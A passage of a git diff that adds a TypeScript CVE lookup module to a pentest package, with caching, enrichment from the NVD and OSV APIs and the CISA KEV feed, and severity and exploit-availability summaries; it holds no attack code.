+  export async function get(cveId: string, config: CVECacheConfig = {}): Promise<CVETypes.CVEData | undefined> {
+    const normalizedId = cveId.toUpperCase()
+
+    // Check memory cache first
+    const memEntry = memoryCache.get(normalizedId)
+    if (memEntry) {
+      if (memEntry.expiresAt > Date.now()) {
+        memEntry.hits++
+        cacheStats.hits++
+        log.debug("CVE cache hit (memory)", { cveId: normalizedId, hits: memEntry.hits })
+        return memEntry.cve
+      } else {
+        // Expired, remove from memory
+        memoryCache.delete(normalizedId)
+      }
+    }
+
+    // Check file cache if not memory-only
+    if (!config.memoryOnly) {
+      try {
+        const entry = await Storage.read<CVETypes.CacheEntry>([...CACHE_PATH, normalizedId])
+        if (entry) {
+          const parsed = CVETypes.CacheEntry.parse(entry)
+          if (parsed.expiresAt > Date.now()) {
+            // Valid cache entry, populate memory cache
+            parsed.hits++
+            memoryCache.set(normalizedId, parsed)
+            cacheStats.hits++
+            log.debug("CVE cache hit (file)", { cveId: normalizedId })
+            return parsed.cve
+          } else {
+            // Expired, clean up
+            await Storage.remove([...CACHE_PATH, normalizedId])
+          }
+        }
+      } catch {
+        // Cache miss or parse error
+      }
+    }
+
+    cacheStats.misses++
+    log.debug("CVE cache miss", { cveId: normalizedId })
+    return undefined
+  }
+
+  /**
+   * Store a CVE in cache
+   */
+  export async function set(cve: CVETypes.CVEData, config: CVECacheConfig = {}): Promise<void> {
+    const ttl = config.ttl ?? DEFAULT_TTL
+    const maxEntries = config.maxEntries ?? DEFAULT_MAX_ENTRIES
+    const normalizedId = cve.id.toUpperCase()
+
+    const entry: CVETypes.CacheEntry = {
+      cve,
+      cachedAt: Date.now(),
+      expiresAt: Date.now() + ttl,
+      source: cve.source,
+      hits: 0,
+    }
+
+    // Check if we need to evict entries
+    if (memoryCache.size >= maxEntries) {
+      await evictLRU(Math.floor(maxEntries * 0.1)) // Evict 10%
+    }
+
+    // Store in memory cache
+    memoryCache.set(normalizedId, entry)
+
+    // Store in file cache if not memory-only
+    if (!config.memoryOnly) {
+      try {
+        await Storage.write([...CACHE_PATH, normalizedId], entry)
+      } catch (error) {
+        log.warn("Failed to write CVE to file cache", { cveId: normalizedId, error })
+      }
+    }
+
+    // Update statistics
+    cacheStats.entries = memoryCache.size
+    cacheStats.newestEntry = entry.cachedAt
+    if (!cacheStats.oldestEntry || entry.cachedAt < cacheStats.oldestEntry) {
+      cacheStats.oldestEntry = entry.cachedAt
+    }
+
+    log.debug("CVE cached", { cveId: normalizedId, expiresAt: new Date(entry.expiresAt).toISOString() })
+  }
+
+  /**
+   * Check if a CVE is in cache (without fetching)
+   */
+  export async function has(cveId: string, config: CVECacheConfig = {}): Promise<boolean> {
+    const normalizedId = cveId.toUpperCase()
+
+    // Check memory cache
+    const memEntry = memoryCache.get(normalizedId)
+    if (memEntry && memEntry.expiresAt > Date.now()) {
+      return true
+    }
+
+    // Check file cache if not memory-only
+    if (!config.memoryOnly) {
+      try {
+        const entry = await Storage.read<CVETypes.CacheEntry>([...CACHE_PATH, normalizedId])
+        if (entry) {
+          const parsed = CVETypes.CacheEntry.parse(entry)
+          return parsed.expiresAt > Date.now()
+        }
+      } catch {
+        // Not in cache
+      }
+    }
+
+    return false
+  }
+
+  /**
+   * Remove a CVE from cache
+   */
+  export async function remove(cveId: string, config: CVECacheConfig = {}): Promise<void> {
+    const normalizedId = cveId.toUpperCase()
+
+    memoryCache.delete(normalizedId)
+
+    if (!config.memoryOnly) {
+      try {
+        await Storage.remove([...CACHE_PATH, normalizedId])
+      } catch {
+        // Ignore delete errors
+      }
+    }
+
+    cacheStats.entries = memoryCache.size
+    log.debug("CVE removed from cache", { cveId: normalizedId })
+  }
+
+  /**
+   * Get multiple CVEs from cache
+   */
+  export async function getMany(
+    cveIds: string[],
+    config: CVECacheConfig = {}
+  ): Promise<Map<string, CVETypes.CVEData | undefined>> {
+    const results = new Map<string, CVETypes.CVEData | undefined>()
+
+    for (const cveId of cveIds) {
+      results.set(cveId.toUpperCase(), await get(cveId, config))
+    }
+
+    return results
+  }
+
+  /**
+   * Store multiple CVEs in cache
+   */
+  export async function setMany(cves: CVETypes.CVEData[], config: CVECacheConfig = {}): Promise<void> {
+    for (const cve of cves) {
+      await set(cve, config)
+    }
+  }
+
+  /**
+   * Clear all cached CVEs
+   */
+  export async function clear(config: CVECacheConfig = {}): Promise<number> {
+    const count = memoryCache.size
+    memoryCache.clear()
+
+    if (!config.memoryOnly) {
+      try {
+        const keys = await Storage.list(CACHE_PATH)
+        for (const key of keys) {
+          await Storage.remove(key)
+        }
+      } catch {
+        // Ignore errors during cleanup
+      }
+    }
+
+    // Reset stats
+    cacheStats = {
+      entries: 0,
+      hits: 0,
+      misses: 0,
+      size: 0,
+      oldestEntry: undefined,
+      newestEntry: undefined,
+    }
+
+    log.info("CVE cache cleared", { entriesRemoved: count })
+    return count
+  }
+
+  /**
+   * Get cache statistics
+   */
+  export async function stats(config: CVECacheConfig = {}): Promise<CVETypes.CacheStats> {
+    // Calculate approximate size
+    let size = 0
+    for (const entry of memoryCache.values()) {
+      size += JSON.stringify(entry).length
+    }
+
+    // Update oldest/newest from memory cache
+    let oldest: number | undefined
+    let newest: number | undefined
+    for (const entry of memoryCache.values()) {
+      if (!oldest || entry.cachedAt < oldest) oldest = entry.cachedAt
+      if (!newest || entry.cachedAt > newest) newest = entry.cachedAt
+    }
+
+    return {
+      ...cacheStats,
+      entries: memoryCache.size,
+      size,
+      oldestEntry: oldest,
+      newestEntry: newest,
+    }
+  }
+
+  /**
+   * Clean up expired entries
+   */
+  export async function cleanup(config: CVECacheConfig = {}): Promise<number> {
+    const now = Date.now()
+    let removed = 0
+
+    // Clean memory cache
+    for (const [id, entry] of memoryCache.entries()) {
+      if (entry.expiresAt <= now) {
+        memoryCache.delete(id)
+        removed++
+      }
+    }
+
+    // Clean file cache if not memory-only
+    if (!config.memoryOnly) {
+      try {
+        const keys = await Storage.list(CACHE_PATH)
+        for (const key of keys) {
+          try {
+            const entry = await Storage.read<CVETypes.CacheEntry>(key)
+            if (entry) {
+              const parsed = CVETypes.CacheEntry.parse(entry)
+              if (parsed.expiresAt <= now) {
+                await Storage.remove(key)
+                removed++
+              }
+            }
+          } catch {
+            // Invalid entry, remove it
+            await Storage.remove(key)
+            removed++
+          }
+        }
+      } catch {
+        // Ignore list errors
+      }
+    }
+
+    cacheStats.entries = memoryCache.size
+    log.info("CVE cache cleanup complete", { removed })
+    return removed
+  }
+
+  /**
+   * Evict least recently used entries
+   */
+  async function evictLRU(count: number): Promise<void> {
+    // Sort entries by hits (ascending) then by age (oldest first)
+    const entries = Array.from(memoryCache.entries()).sort((a, b) => {
+      if (a[1].hits !== b[1].hits) return a[1].hits - b[1].hits
+      return a[1].cachedAt - b[1].cachedAt
+    })
+
+    const toEvict = entries.slice(0, count)
+    for (const [id] of toEvict) {
+      memoryCache.delete(id)
+      try {
+        await Storage.remove([...CACHE_PATH, id])
+      } catch {
+        // Ignore delete errors
+      }
+    }
+
+    log.debug("LRU eviction complete", { evicted: toEvict.length })
+  }
+
+  /**
+   * Warm up cache by loading from file storage
+   */
+  export async function warmup(config: CVECacheConfig = {}): Promise<number> {
+    if (config.memoryOnly) return 0
+
+    let loaded = 0
+    const now = Date.now()
+
+    try {
+      const keys = await Storage.list(CACHE_PATH)
+      for (const key of keys) {
+        try {
+          const entry = await Storage.read<CVETypes.CacheEntry>(key)
+          if (entry) {
+            const parsed = CVETypes.CacheEntry.parse(entry)
+            if (parsed.expiresAt > now) {
+              memoryCache.set(parsed.cve.id.toUpperCase(), parsed)
+              loaded++
+            } else {
+              // Expired, clean up
+              await Storage.remove(key)
+            }
+          }
+        } catch {
+          // Invalid entry, remove it
+          await Storage.remove(key)
+        }
+      }
+    } catch {
+      // Ignore list errors
+    }
+
+    cacheStats.entries = memoryCache.size
+    log.info("CVE cache warmup complete", { loaded })
+    return loaded
+  }
+
+  /**
+   * Save cache statistics to storage
+   */
+  export async function saveStats(): Promise<void> {
+    const currentStats = await stats()
+    try {
+      await Storage.write(STATS_PATH, currentStats)
+    } catch {
+      // Ignore save errors
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/cve/enricher.ts b/packages/opencode/src/pentest/cve/enricher.ts
new file mode 100644
index 00000000000..16d4d7dba77
--- /dev/null
+++ b/packages/opencode/src/pentest/cve/enricher.ts
@@ -0,0 +1,355 @@
+/**
+ * @fileoverview CVE Enricher
+ *
+ * Enriches scanner findings with CVE data from external sources.
+ * Provides utilities for:
+ * - Batch enrichment of findings
+ * - Severity updates from CVSS scores
+ * - KEV status checks
+ * - Exploit availability indicators
+ *
+ * @module pentest/cve/enricher
+ */
+
+import { Log } from "../../util/log"
+import { CVETypes } from "./types"
+import { CVELookup } from "./lookup"
+import type { LookupConfig } from "./lookup"
+
+const log = Log.create({ service: "pentest.cve.enricher" })
+
+/**
+ * Enrichment options
+ */
+export interface EnrichmentOptions extends LookupConfig {
+  /** Update severity based on CVSS */
+  updateSeverity?: boolean
+  /** Check CISA KEV status */
+  checkKEV?: boolean
+  /** Add exploit information */
+  addExploitInfo?: boolean
+  /** Maximum concurrent lookups */
+  concurrency?: number
+}
+
+/**
+ * CVE Enricher namespace
+ */
+export namespace CVEEnricher {
+  /**
+   * Enrich a single CVE finding
+   */
+  export async function enrich(
+    input: CVETypes.EnrichmentInput,
+    options: EnrichmentOptions = {}
+  ): Promise<CVETypes.EnrichmentResult> {
+    const { updateSeverity = true, checkKEV = true, addExploitInfo = true } = options
+
+    const result: CVETypes.EnrichmentResult = {
+      cveId: input.cveId,
+      enriched: false,
+      changes: {
+        severityUpdated: false,
+        descriptionUpdated: false,
+        cvssAdded: false,
+        cweAdded: false,
+        exploitabilityAdded: false,
+      },
+    }
+
+    try {
+      // Look up CVE data
+      const lookupResult = await CVELookup.lookup(input.cveId, options)
+
+      if (lookupResult.status !== "success" || !lookupResult.cve) {
+        result.error = lookupResult.error || "CVE not found"
+        return result
+      }
+
+      const cve = lookupResult.cve
+      result.data = cve
+      result.enriched = true
+
+      // Track changes
+      if (!input.currentDescription && cve.description) {
+        result.changes.descriptionUpdated = true
+      }
+
+      if (cve.cvss.v3 || cve.cvss.v2) {
+        result.changes.cvssAdded = true
+      }
+
+      if (cve.cwe.length > 0) {
+        result.changes.cweAdded = true
+      }
+
+      // Update severity from CVSS if requested
+      if (updateSeverity && input.currentSeverity) {
+        const cvssData = CVETypes.getHighestCVSS(cve.cvss)
+        if (cvssData && cvssData.severity !== input.currentSeverity) {
+          result.changes.severityUpdated = true
+          log.debug("Severity updated from CVSS", {
+            cveId: input.cveId,
+            from: input.currentSeverity,
+            to: cvssData.severity,
+          })
+        }
+      }
+
+      // Check KEV status if requested
+      if (checkKEV) {
+        const kevResults = await CVELookup.kevCheck([input.cveId], options)
+        const kevResult = kevResults[0]
+
+        if (kevResult?.inKEV) {
+          if (!cve.exploitability) {
+            cve.exploitability = {
+              inKEV: true,
+              hasPublicExploit: false,
+            }
+          } else {
+            cve.exploitability.inKEV = true
+          }
+
+          if (kevResult.entry) {
+            cve.exploitability.kevDateAdded = kevResult.entry.dateAdded
+            cve.exploitability.kevDueDate = kevResult.entry.dueDate
+          }
+
+          result.changes.exploitabilityAdded = true
+          log.info("CVE is in CISA KEV", { cveId: input.cveId })
+        }
+      }
+
+      // Add exploit information if requested
+      if (addExploitInfo && cve.references) {
+        const exploitIndicators = ["exploit", "poc", "github.com", "exploit-db", "packetstorm"]
+        const exploitRefs: string[] = []
+
+        for (const ref of cve.references) {
+          const urlLower = ref.url.toLowerCase()
+          const hasExploitTag = ref.tags?.some((t) => t.toLowerCase().includes("exploit"))
+
+          if (hasExploitTag || exploitIndicators.some((ind) => urlLower.includes(ind))) {
+            exploitRefs.push(ref.url)
+          }
+        }
+
+        if (exploitRefs.length > 0) {
+          if (!cve.exploitability) {
+            cve.exploitability = {
+              inKEV: false,
+              hasPublicExploit: true,
+              exploitReferences: exploitRefs,
+            }
+          } else {
+            cve.exploitability.hasPublicExploit = true
+            cve.exploitability.exploitReferences = exploitRefs
+          }
+
+          result.changes.exploitabilityAdded = true
+        }
+      }
+
+      result.data = cve
+    } catch (error) {
+      result.error = error instanceof Error ? error.message : String(error)
+      log.error("CVE enrichment failed", { cveId: input.cveId, error: result.error })
+    }
+
+    return result
+  }
+
+  /**
+   * Enrich multiple CVE findings
+   */
+  export async function enrichMany(
+    inputs: CVETypes.EnrichmentInput[],
+    options: EnrichmentOptions = {}
+  ): Promise<CVETypes.EnrichmentResult[]> {
+    const { concurrency = 5 } = options
+    const results: CVETypes.EnrichmentResult[] = []
+
+    // Process in chunks for concurrency control
+    const chunks: CVETypes.EnrichmentInput[][] = []
+    for (let i = 0; i < inputs.length; i += concurrency) {
+      chunks.push(inputs.slice(i, i + concurrency))
+    }
+
+    for (const chunk of chunks) {
+      const chunkResults = await Promise.all(chunk.map((input) => enrich(input, options)))
+      results.push(...chunkResults)
+    }
+
+    // Log summary
+    const enriched = results.filter((r) => r.enriched).length
+    const sevUpdated = results.filter((r) => r.changes.severityUpdated).length
+    const inKEV = results.filter((r) => r.data?.exploitability?.inKEV).length
+
+    log.info("Bulk enrichment complete", {
+      total: inputs.length,
+      enriched,
+      severityUpdated: sevUpdated,
+      inKEV,
+    })
+
+    return results
+  }
+
+  /**
+   * Extract CVE IDs from text
+   */
+  export function extractCVEIds(text: string): string[] {
+    const cvePattern = /CVE-\d{4}-\d{4,}/gi
+    const matches = text.match(cvePattern) || []
+    return [...new Set(matches.map((m) => m.toUpperCase()))]
+  }
+
+  /**
+   * Create enrichment input from a finding
+   */
+  export function createInput(
+    cveId: string,
+    severity?: CVETypes.Severity,
+    description?: string,
+    source?: string
+  ): CVETypes.EnrichmentInput {
+    return {
+      cveId: cveId.toUpperCase() as CVETypes.CVEId,
+      currentSeverity: severity,
+      currentDescription: description,
+      source,
+    }
+  }
+
+  /**
+   * Generate enrichment summary
+   */
+  export function summarize(results: CVETypes.EnrichmentResult[]): {
+    total: number
+    enriched: number
+    failed: number
+    severityUpdated: number
+    inKEV: number
+    hasExploit: number
+    bySeverity: Record<CVETypes.Severity, number>
+  } {
+    const summary = {
+      total: results.length,
+      enriched: 0,
+      failed: 0,
+      severityUpdated: 0,
+      inKEV: 0,
+      hasExploit: 0,
+      bySeverity: {
+        critical: 0,
+        high: 0,
+        medium: 0,
+        low: 0,
+        none: 0,
+      } as Record<CVETypes.Severity, number>,
+    }
+
+    for (const result of results) {
+      if (result.enriched) {
+        summary.enriched++
+        if (result.changes.severityUpdated) summary.severityUpdated++
+        if (result.data?.exploitability?.inKEV) summary.inKEV++
+        if (result.data?.exploitability?.hasPublicExploit) summary.hasExploit++
+        if (result.data?.severity) {
+          summary.bySeverity[result.data.severity]++
+        }
+      } else {
+        summary.failed++
+      }
+    }
+
+    return summary
+  }
+
+  /**
+   * Format CVE data for display
+   */
+  export function formatCVE(cve: CVETypes.CVEData): string {
+    const lines: string[] = []
+
+    lines.push(`${cve.id} - ${cve.severity.toUpperCase()}`)
+    lines.push(`  Description: ${truncate(cve.description, 200)}`)
+
+    // CVSS info
+    const cvss = CVETypes.getHighestCVSS(cve.cvss)
+    if (cvss) {
+      lines.push(`  CVSS ${cvss.version}: ${cvss.score} (${cvss.severity})`)
+    }
+
+    // CWE
+    if (cve.cwe.length > 0) {
+      lines.push(`  CWE: ${cve.cwe.map((c) => c.id).join(", ")}`)
+    }
+
+    // Exploitability
+    if (cve.exploitability) {
+      const exploitInfo: string[] = []
+      if (cve.exploitability.inKEV) exploitInfo.push("In CISA KEV")
+      if (cve.exploitability.hasPublicExploit) exploitInfo.push("Public exploit available")
+      if (exploitInfo.length > 0) {
+        lines.push(`  Exploitability: ${exploitInfo.join(", ")}`)
+      }
+    }
+
+    // Affected products
+    if (cve.affected.length > 0) {
+      const products = cve.affected.slice(0, 3).map((a) => `${a.vendor}/${a.product}`)
+      lines.push(`  Affected: ${products.join(", ")}${cve.affected.length > 3 ? "..." : ""}`)
+    }
+
+    // References
+    if (cve.references.length > 0) {
+      lines.push(`  References: ${cve.references.length} link(s)`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format multiple CVEs for display
+   */
+  export function formatCVEs(cves: CVETypes.CVEData[]): string {
+    if (cves.length === 0) return "No CVEs found"
+
+    const sections: string[] = []
+
+    // Group by severity
+    const bySeverity: Record<CVETypes.Severity, CVETypes.CVEData[]> = {
+      critical: [],
+      high: [],
+      medium: [],
+      low: [],
+      none: [],
+    }
+
+    for (const cve of cves) {
+      bySeverity[cve.severity].push(cve)
+    }
+
+    for (const severity of ["critical", "high", "medium", "low", "none"] as CVETypes.Severity[]) {
+      const severityCVEs = bySeverity[severity]
+      if (severityCVEs.length > 0) {
+        sections.push(`\n## ${severity.toUpperCase()} (${severityCVEs.length})`)
+        for (const cve of severityCVEs) {
+          sections.push(formatCVE(cve))
+        }
+      }
+    }
+
+    return sections.join("\n")
+  }
+
+  /**
+   * Truncate string to max length
+   */
+  function truncate(str: string, maxLength: number): string {
+    if (str.length <= maxLength) return str
+    return str.slice(0, maxLength - 3) + "..."
+  }
+}
diff --git a/packages/opencode/src/pentest/cve/index.ts b/packages/opencode/src/pentest/cve/index.ts
new file mode 100644
index 00000000000..4aea68435d3
--- /dev/null
+++ b/packages/opencode/src/pentest/cve/index.ts
@@ -0,0 +1,13 @@
+/**
+ * @fileoverview CVE Lookup Service Module
+ *
+ * Exports for CVE lookup, caching, and enrichment functionality.
+ *
+ * @module pentest/cve
+ */
+
+export { CVETypes } from "./types"
+export { CVECache, type CVECacheConfig } from "./cache"
+export { CVELookup, type LookupConfig } from "./lookup"
+export { CVEEnricher, type EnrichmentOptions } from "./enricher"
+export { CVETool } from "./tool"
diff --git a/packages/opencode/src/pentest/cve/lookup.ts b/packages/opencode/src/pentest/cve/lookup.ts
new file mode 100644
index 00000000000..d3061d8558b
--- /dev/null
+++ b/packages/opencode/src/pentest/cve/lookup.ts
@@ -0,0 +1,758 @@
+/**
+ * @fileoverview CVE Lookup API Integration
+ *
+ * Integrates with external CVE databases:
+ * - NVD API 2.0 (NIST National Vulnerability Database)
+ * - OSV API (Open Source Vulnerabilities)
+ * - CISA KEV (Known Exploited Vulnerabilities)
+ *
+ * @module pentest/cve/lookup
+ */
+
+import { Log } from "../../util/log"
+import { CVETypes } from "./types"
+import { CVECache } from "./cache"
+import type { CVECacheConfig } from "./cache"
+
+const log = Log.create({ service: "pentest.cve.lookup" })
+
+/**
+ * API configuration
+ */
+export interface LookupConfig extends CVECacheConfig {
+  /** NVD API key for higher rate limits */
+  nvdApiKey?: string
+  /** Timeout in milliseconds */
+  timeout?: number
+  /** Skip cache lookup */
+  skipCache?: boolean
+  /** Preferred API source */
+  preferredSource?: CVETypes.APISource
+}
+
+const NVD_API_BASE = "https://services.nvd.nist.gov/rest/json/cves/2.0"
+const OSV_API_BASE = "https://api.osv.dev/v1"
+const CISA_KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"
+
+const DEFAULT_TIMEOUT = 30000
+
+// Rate limiting tracking
+const rateLimits: Record<string, CVETypes.RateLimitInfo> = {}
+
+// KEV cache (refresh every hour)
+let kevCache: Map<string, CVETypes.KEVEntry> | undefined
+let kevLastFetched = 0
+const KEV_CACHE_TTL = 60 * 60 * 1000 // 1 hour
+
+/**
+ * CVE Lookup namespace
+ */
+export namespace CVELookup {
+  /**
+   * Look up a single CVE
+   */
+  export async function lookup(cveId: string, config: LookupConfig = {}): Promise<CVETypes.CVELookupResult> {
+    const startTime = Date.now()
+    const normalizedId = cveId.toUpperCase()
+
+    // Validate CVE ID format
+    const parseResult = CVETypes.CVEId.safeParse(normalizedId)
+    if (!parseResult.success) {
+      return {
+        status: "error",
+        error: `Invalid CVE ID format: ${cveId}`,
+        cached: false,
+        responseTime: Date.now() - startTime,
+      }
+    }
+
+    // Check cache first
+    if (!config.skipCache) {
+      const cached = await CVECache.get(normalizedId, config)
+      if (cached) {
+        return {
+          status: "success",
+          cve: cached,
+          source: "cache",
+          cached: true,
+          responseTime: Date.now() - startTime,
+        }
+      }
+    }
+
+    // Try preferred source first, then fallback
+    const sources: CVETypes.APISource[] =
+      config.preferredSource && config.preferredSource !== "cache"
+        ? [config.preferredSource, "nvd", "osv"].filter((s, i, a) => a.indexOf(s) === i) as CVETypes.APISource[]
+        : ["nvd", "osv"]
+
+    let lastError: string | undefined
+
+    for (const source of sources) {
+      try {
+        const result = await fetchFromSource(normalizedId, source, config)
+        if (result.status === "success" && result.cve) {
+          // Cache the result
+          await CVECache.set(result.cve, config)
+          return {
+            ...result,
+            cached: false,
+            responseTime: Date.now() - startTime,
+          }
+        } else if (result.status === "rate_limited") {
+          // Don't try other sources on rate limit, return immediately
+          return {
+            ...result,
+            cached: false,
+            responseTime: Date.now() - startTime,
+          }
+        } else if (result.status === "not_found") {
+          // Try next source
+          lastError = result.error
+        } else {
+          lastError = result.error
+        }
+      } catch (error) {
+        lastError = error instanceof Error ? error.message : String(error)
+        log.warn("CVE lookup failed for source", { cveId: normalizedId, source, error: lastError })
+      }
+    }
+
+    return {
+      status: "not_found",
+      error: lastError || `CVE ${normalizedId} not found in any source`,
+      cached: false,
+      responseTime: Date.now() - startTime,
+    }
+  }
+
+  /**
+   * Look up multiple CVEs
+   */
+  export async function bulkLookup(cveIds: string[], config: LookupConfig = {}): Promise<CVETypes.BulkLookupResult> {
+    const startTime = Date.now()
+    const results: CVETypes.CVELookupResult[] = []
+
+    let found = 0
+    let notFound = 0
+    let errors = 0
+    let cached = 0
+
+    // Process in parallel with concurrency limit
+    const concurrency = 5
+    const chunks: string[][] = []
+    for (let i = 0; i < cveIds.length; i += concurrency) {
+      chunks.push(cveIds.slice(i, i + concurrency))
+    }
+
+    for (const chunk of chunks) {
+      const chunkResults = await Promise.all(chunk.map((id) => lookup(id, config)))
+
+      for (const result of chunkResults) {
+        results.push(result)
+        if (result.status === "success") {
+          found++
+          if (result.cached) cached++
+        } else if (result.status === "not_found") {
+          notFound++
+        } else {
+          errors++
+        }
+      }
+    }
+
+    return {
+      results,
+      stats: {
+        total: cveIds.length,
+        found,
+        notFound,
+        errors,
+        cached,
+        duration: Date.now() - startTime,
+      },
+    }
+  }
+
+  /**
+   * Search CVEs by criteria
+   */
+  export async function search(options: CVETypes.CVESearchOptions, config: LookupConfig = {}): Promise<CVETypes.CVESearchResult> {
+    const timeout = config.timeout ?? DEFAULT_TIMEOUT
+
+    // Build NVD API query parameters
+    const params = new URLSearchParams()
+
+    if (options.keyword) {
+      params.set("keywordSearch", options.keyword)
+    }
+    if (options.cpe) {
+      params.set("cpeName", options.cpe)
+    }
+    if (options.cwe) {
+      params.set("cweId", options.cwe)
+    }
+    if (options.cvssV3Severity) {
+      params.set("cvssV3Severity", options.cvssV3Severity.toUpperCase())
+    }
+    if (options.publishedStartDate) {
+      params.set("pubStartDate", options.publishedStartDate)
+    }
+    if (options.publishedEndDate) {
+      params.set("pubEndDate", options.publishedEndDate)
+    }
+    if (options.modifiedStartDate) {
+      params.set("lastModStartDate", options.modifiedStartDate)
+    }
+    if (options.modifiedEndDate) {
+      params.set("lastModEndDate", options.modifiedEndDate)
+    }
+    if (options.hasKev) {
+      params.set("hasKev", "")
+    }
+
+    params.set("resultsPerPage", String(options.limit ?? 20))
+    params.set("startIndex", String(options.offset ?? 0))
+
+    const url = `${NVD_API_BASE}?${params.toString()}`
+
+    const headers: Record<string, string> = {
+      Accept: "application/json",
+    }
+    if (config.nvdApiKey) {
+      headers["apiKey"] = config.nvdApiKey
+    }
+
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url, {
+        headers,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      // Handle rate limiting
+      updateRateLimits("nvd", response)
+
+      if (response.status === 403) {
+        throw new Error("Rate limited by NVD API")
+      }
+
+      if (!response.ok) {
+        throw new Error(`NVD API error: ${response.status} ${response.statusText}`)
+      }
+
+      const data = await response.json()
+      const cves = parseNVDResponse(data)
+
+      // Cache results
+      for (const cve of cves) {
+        await CVECache.set(cve, config)
+      }
+
+      return {
+        cves,
+        totalResults: data.totalResults || cves.length,
+        resultsPerPage: data.resultsPerPage || cves.length,
+        startIndex: data.startIndex || 0,
+      }
+    } catch (error) {
+      log.error("CVE search failed", { options, error })
+      throw error
+    }
+  }
+
+  /**
+   * Check if CVEs are in CISA KEV
+   */
+  export async function kevCheck(cveIds: string[], config: LookupConfig = {}): Promise<CVETypes.KEVCheckResult[]> {
+    await ensureKEVCache(config)
+
+    const results: CVETypes.KEVCheckResult[] = []
+
+    for (const cveId of cveIds) {
+      const normalizedId = cveId.toUpperCase()
+      const entry = kevCache?.get(normalizedId)
+
+      results.push({
+        cveId: normalizedId as CVETypes.CVEId,
+        inKEV: !!entry,
+        entry,
+      })
+    }
+
+    return results
+  }
+
+  /**
+   * Get rate limit information for an API
+   */
+  export function getRateLimit(source: CVETypes.APISource): CVETypes.RateLimitInfo | undefined {
+    return rateLimits[source]
+  }
+
+  /**
+   * Fetch CVE from a specific source
+   */
+  async function fetchFromSource(
+    cveId: string,
+    source: CVETypes.APISource,
+    config: LookupConfig
+  ): Promise<CVETypes.CVELookupResult> {
+    switch (source) {
+      case "nvd":
+        return fetchFromNVD(cveId, config)
+      case "osv":
+        return fetchFromOSV(cveId, config)
+      default:
+        return { status: "error", error: `Unknown source: ${source}`, cached: false }
+    }
+  }
+
+  /**
+   * Fetch CVE from NVD API
+   */
+  async function fetchFromNVD(cveId: string, config: LookupConfig): Promise<CVETypes.CVELookupResult> {
+    const timeout = config.timeout ?? DEFAULT_TIMEOUT
+    const url = `${NVD_API_BASE}?cveId=${cveId}`
+
+    const headers: Record<string, string> = {
+      Accept: "application/json",
+    }
+    if (config.nvdApiKey) {
+      headers["apiKey"] = config.nvdApiKey
+    }
+
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url, {
+        headers,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      // Handle rate limiting
+      updateRateLimits("nvd", response)
+
+      if (response.status === 403) {
+        const retryAfter = response.headers.get("Retry-After")
+        return {
+          status: "rate_limited",
+          error: `Rate limited by NVD API. Retry after ${retryAfter || "30"} seconds.`,
+          cached: false,
+        }
+      }
+
+      if (response.status === 404) {
+        return { status: "not_found", error: `CVE ${cveId} not found in NVD`, cached: false }
+      }
+
+      if (!response.ok) {
+        return { status: "error", error: `NVD API error: ${response.status} ${response.statusText}`, cached: false }
+      }
+
+      const data = await response.json()
+      const cves = parseNVDResponse(data)
+
+      if (cves.length === 0) {
+        return { status: "not_found", error: `CVE ${cveId} not found in NVD`, cached: false }
+      }
+
+      return {
+        status: "success",
+        cve: cves[0],
+        source: "nvd",
+        cached: false,
+      }
+    } catch (error) {
+      if (error instanceof Error && error.name === "AbortError") {
+        return { status: "error", error: "Request timed out", cached: false }
+      }
+      return { status: "error", error: error instanceof Error ? error.message : String(error), cached: false }
+    }
+  }
+
+  /**
+   * Fetch CVE from OSV API
+   */
+  async function fetchFromOSV(cveId: string, config: LookupConfig): Promise<CVETypes.CVELookupResult> {
+    const timeout = config.timeout ?? DEFAULT_TIMEOUT
+    const url = `${OSV_API_BASE}/vulns/${cveId}`
+
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url, {
+        headers: { Accept: "application/json" },
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      if (response.status === 404) {
+        return { status: "not_found", error: `CVE ${cveId} not found in OSV`, cached: false }
+      }
+
+      if (!response.ok) {
+        return { status: "error", error: `OSV API error: ${response.status} ${response.statusText}`, cached: false }
+      }
+
+      const data = await response.json()
+      const cve = parseOSVResponse(cveId, data)
+
+      if (!cve) {
+        return { status: "not_found", error: `CVE ${cveId} not found in OSV`, cached: false }
+      }
+
+      return {
+        status: "success",
+        cve,
+        source: "osv",
+        cached: false,
+      }
+    } catch (error) {
+      if (error instanceof Error && error.name === "AbortError") {
+        return { status: "error", error: "Request timed out", cached: false }
+      }
+      return { status: "error", error: error instanceof Error ? error.message : String(error), cached: false }
+    }
+  }
+
+  /**
+   * Parse NVD API response into CVEData array
+   */
+  function parseNVDResponse(data: Record<string, unknown>): CVETypes.CVEData[] {
+    const cves: CVETypes.CVEData[] = []
+    const vulnerabilities = (data.vulnerabilities || []) as Record<string, unknown>[]
+
+    for (const vuln of vulnerabilities) {
+      const cveData = vuln.cve as Record<string, unknown>
+      if (!cveData) continue
+
+      const id = cveData.id as string
+      if (!id) continue
+
+      // Extract descriptions
+      const descriptions = (cveData.descriptions || []) as { lang: string; value: string }[]
+      const englishDesc = descriptions.find((d) => d.lang === "en")?.value || ""
+
+      // Extract CVSS metrics
+      const metrics = cveData.metrics as Record<string, unknown[]> | undefined
+      const cvss: CVETypes.CVSS = {}
+
+      if (metrics?.cvssMetricV31?.[0]) {
+        const m = metrics.cvssMetricV31[0] as Record<string, unknown>
+        const cvssData = m.cvssData as Record<string, unknown>
+        if (cvssData) {
+          cvss.v3 = {
+            version: "3.1",
+            score: (cvssData.baseScore as number) || 0,
+            vector: (cvssData.vectorString as string) || "",
+            severity: mapSeverity((cvssData.baseSeverity as string) || ""),
+            attackVector: cvssData.attackVector as CVETypes.CVSSv3["attackVector"],
+            attackComplexity: cvssData.attackComplexity as CVETypes.CVSSv3["attackComplexity"],
+            privilegesRequired: cvssData.privilegesRequired as CVETypes.CVSSv3["privilegesRequired"],
+            userInteraction: cvssData.userInteraction as CVETypes.CVSSv3["userInteraction"],
